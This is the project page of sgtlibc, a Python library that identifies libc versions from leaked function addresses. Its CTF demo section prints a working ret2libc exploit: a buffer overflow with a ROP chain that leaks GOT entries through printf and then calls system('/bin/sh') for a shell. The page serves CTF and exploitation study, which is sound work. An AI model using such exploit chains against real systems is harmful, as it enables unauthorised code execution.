
An offline Python library for searching libc functions and identifying the libc version. From the shell: `sgtlibc puts:aa0+read:140 --dump system binsh`; from Python: `import sgtlibc; s = sgtlibc.LibcSearcher(); s.add_condition('puts', 0xaa0)`.

Project description


What?

sgtlibc is an offline Python library for searching libc functions: given the addresses of leaked libc functions, it finds the matching libc version in its bundled database.

Install

pip install sgtlibc

Usage

usage: main.py [-h] [-d [DUMP ...]] [-i [INDEX]] [-u [UPDATE]] [funcs_with_addresses]

for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s = sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`

positional arguments:
  funcs_with_addresses  specify `func-name` and `func address` , split by `|`,eg: puts:aa0+read:140 , its means func-put's address = 0xaa0;func-read addr = 0x140 (default: None).

options:
  -h, --help            show this help message and exit
  -d [DUMP ...], --dump [DUMP ...]
                        select funcs to dump its info (default: ['__libc_start_main_ret', 'system', 'dup2', 'read', 'write', 'str_bin_sh']).
  -i [INDEX], --index [INDEX]
                        db index on multi-database found occation (default: 0).
  -u [UPDATE], --update [UPDATE]
                        update current libc database from internet , need non-microsoft-windows environment (default: False).

Quick Start

  • in cmd.exe or /bin/sh

```sh
sgtlibc puts:aa0
sgtlibc puts:aa0+read:140
sgtlibc puts:aa0+read:140 --dump system binsh
```

  • in python3

```python
import sgtlibc
s = sgtlibc.Searcher()
s.add_condition('puts', 0xaa0)
s.add_condition('read', 0x140)
print(s.dump())
print(s.dump(['system', 'str_bin_sh']))
```

Example

  • main args specify func-name and func address, **SHOULD split by `|`**

    eg: puts:aa0+read:140 which means:

    • func-puts address = 0xaa0
    • func-read address = 0x140
  • --update updates the libc database from the internet, based on libc-database; it requires a non-Microsoft-Windows system

  • run the Python code above and you'll get output like this: [screenshot of the Python output, not reproduced here]

  • run the command in a terminal and you'll get output like this: [screenshot of the terminal output, not reproduced here]

  • use in pwntools

```python
from pwn import *  # run `pip install pwntools` first
import sgtlibc

s = sgtlibc.Searcher()
puts_addr = 0xff1234567aa0        # leaked runtime address of puts
s.add_condition('puts', puts_addr)
libc = s.dump()                   # search the database; with several matches, index 0 is used by default
offset = puts_addr - libc[sgtlibc.s_puts]   # libc base: leaked address minus the symbol's offset
system_addr = p64(libc[sgtlibc.s_system] + offset)
binsh_addr = p64(libc[sgtlibc.s_binsh] + offset)
```
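How the condition matching behind `add_condition` works, as an added example that is not sgtlibc's own code: under ASLR only the low 12 bits of a leaked address are stable, so a condition such as puts:aa0 keeps every database entry whose puts offset ends in 0xaa0, a second condition narrows the set, and when several entries survive the `--index` / `db_index` choice picks one. The entry names and offsets below are constructed for the example and belong to no real glibc build.

```python
PAGE_MASK = 0xFFF  # 4 KiB pages: ASLR shifts the base by whole pages, so these bits are stable

# Constructed sample database (entry name -> {symbol: offset}); the offsets are
# made up for this example and do not belong to any real glibc build.
SAMPLE_DB = {
    "libc_A_x64": {"puts": 0x80AA0, "read": 0x110140, "system": 0x4F4E0, "str_bin_sh": 0x1B40FA},
    "libc_B_x64": {"puts": 0x87AA0, "read": 0x111130, "system": 0x55410, "str_bin_sh": 0x1B75AA},
    "libc_C_x64": {"puts": 0x6F6A0, "read": 0x0F7250, "system": 0x45390, "str_bin_sh": 0x18CD57},
}


class PageOffsetSearcher:
    """Minimal reimplementation of the matching idea behind sgtlibc's Searcher."""

    def __init__(self, db=SAMPLE_DB):
        self.db = db
        self.conditions = {}  # symbol -> low 12 bits of the leaked address

    def add_condition(self, func, addr):
        # A full runtime address and a bare page offset (0xaa0) are treated alike.
        self.conditions[func] = addr & PAGE_MASK

    def candidates(self):
        """Names of every entry whose symbol offsets agree with all conditions."""
        hits = []
        for name, symbols in self.db.items():
            if all(func in symbols and (symbols[func] & PAGE_MASK) == low
                   for func, low in self.conditions.items()):
                hits.append(name)
        return hits

    def resolve(self, leaked_func, leaked_addr, wanted, db_index=0):
        """Pick candidate db_index, derive the libc base from one leak and return
        runtime addresses for the wanted symbols (the arithmetic the pwntools
        snippet above performs by hand)."""
        hits = self.candidates()
        if not hits:
            raise LookupError("no libc in the database matches the conditions")
        symbols = self.db[hits[db_index]]
        base = leaked_addr - symbols[leaked_func]
        if base & PAGE_MASK:
            raise ValueError("leak does not match the chosen entry: base is not page aligned")
        return {sym: base + symbols[sym] for sym in wanted}
```

With only the puts condition two constructed entries survive, which is exactly the situation in which the real tool falls back to index 0 unless `--index` is given.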

CTF Problem Solve DEMO

view all sample files

  • use exploit code

```python
import sgtlibc
from sgtlibc.gamebox import *  # gamebox helpers used below: set_config, GameBoxConfig, client, p00, sl, rl, rc, uc, log, interactive

set_config(GameBoxConfig(
    is_local=True, file='./babyrop2', remote='192.168.0.1:25462',
    auto_load=True,
    auto_show_rop=True,
    auto_show_summary=True,
    auto_start_game=True,
    auto_load_shell_str=True,
    auto_show_symbols=True
))
s = sgtlibc.Searcher()
elf = client.elf
payload_exp = b'a' * (28 + 4) + p00(0xdeadbeef)  # overflow position

def leak(func: str):
    # print got[func] via printf, return to main, and record the leaked address as a search condition
    payload = payload_exp + p00(elf.rop['rdi']) + p00(elf.got[func]) + \
        p00(elf.plt['printf']) + p00(elf.symbols['main'])
    sl(payload)
    rl()
    data = rc(6).ljust(8, b'\0')
    data = uc(data)
    s.add_condition(func, data)
    return data

leak('printf')
leak('read')
data = s.dump(db_index=2)  # choose your system index
system_addr = s.get_address(sgtlibc.s_system)
binsh_addr = s.get_address(sgtlibc.s_binsh)
log.info(f'system_addr:{hex(system_addr)}')
log.info(f'binsh_addr:{hex(binsh_addr)}')
payload = payload_exp + p00(elf.rop['rdi']) + p00(binsh_addr) + \
    p00(system_addr) + p00(0xdeadbeef)
sl(payload)
interactive()
```
  • result: [screenshot of the session output, not reproduced here]

Notice

The bundled libc database was last updated a long time ago; we strongly recommend updating it by running `sgtlibc --update`.

Download files

Source Distribution: sgtlibc-1.12.183.tar.gz (20.8 MB)

Built Distribution: sgtlibc-1.12.183-py3-none-any.whl (21.5 MB, Python 3)
